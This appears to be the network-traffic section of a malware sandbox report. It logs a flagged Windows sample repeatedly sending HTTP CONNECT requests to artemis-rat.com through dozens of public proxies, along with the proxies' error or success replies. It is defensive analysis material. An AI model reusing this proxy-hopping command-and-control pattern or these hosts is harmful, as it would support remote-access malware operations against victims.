                                              Mar 11, 2024 08:37:26.044833899 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1738192.168.2.454963161.97.163.52220407284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.903595924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.906272888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.037640095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.054030895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1739192.168.2.453850188.0.2.188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.968606949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.206178904 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1740192.168.2.451241142.147.114.5080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.970876932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.220779896 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1741192.168.2.45523894.177.106.17823247284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.000257015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.426713943 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.22.1
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1742192.168.2.45508045.189.151.1780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.000565052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.848009109 CET202INHTTP/1.0 403 Forbidden
                                              Content-Length: 710
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Expires: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1743192.168.2.45524151.161.131.84199877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.007114887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.868000984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054152012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1744192.168.2.45123037.187.77.58107107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.047996044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.155797005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1745192.168.2.45503045.162.132.1579997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.052301884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.156255007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.571686983 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1746192.168.2.45126545.162.132.19997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.053003073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.155852079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163552999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.163429976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.258749008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.256803989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:14.335062027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:38.335074902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:26.334995031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1747192.168.2.454075107.181.161.8141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.066603899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1748192.168.2.45394920.80.103.19331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.068849087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.987356901 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1749192.168.2.451337185.109.184.150638197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.071641922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.163258076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163551092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.163856030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.256829977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.258917093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:14.256941080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:38.319444895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:26.334991932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1750192.168.2.45505431.193.92.336297284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.097243071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1751192.168.2.45386098.162.25.7316537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.123743057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1752192.168.2.455157139.129.162.653128
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.132427931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.504738092 CET1286INHTTP/1.1 503 Service Unavailable
                                              Server: squid/3.3.8
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 3556
                                              X-Squid-Error: ERR_DNS_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;b


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1753192.168.2.453763117.160.250.13388997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.142052889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163569927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.852899075 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1754192.168.2.45398245.233.169.4099947284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.146384001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.156142950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.918948889 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1755192.168.2.45524036.134.91.8288887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:26.187127113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.719319105 CET324INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.16.1
                                              Date: Mon, 11 Mar 2024 07:37:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 157
                                              Connection: close
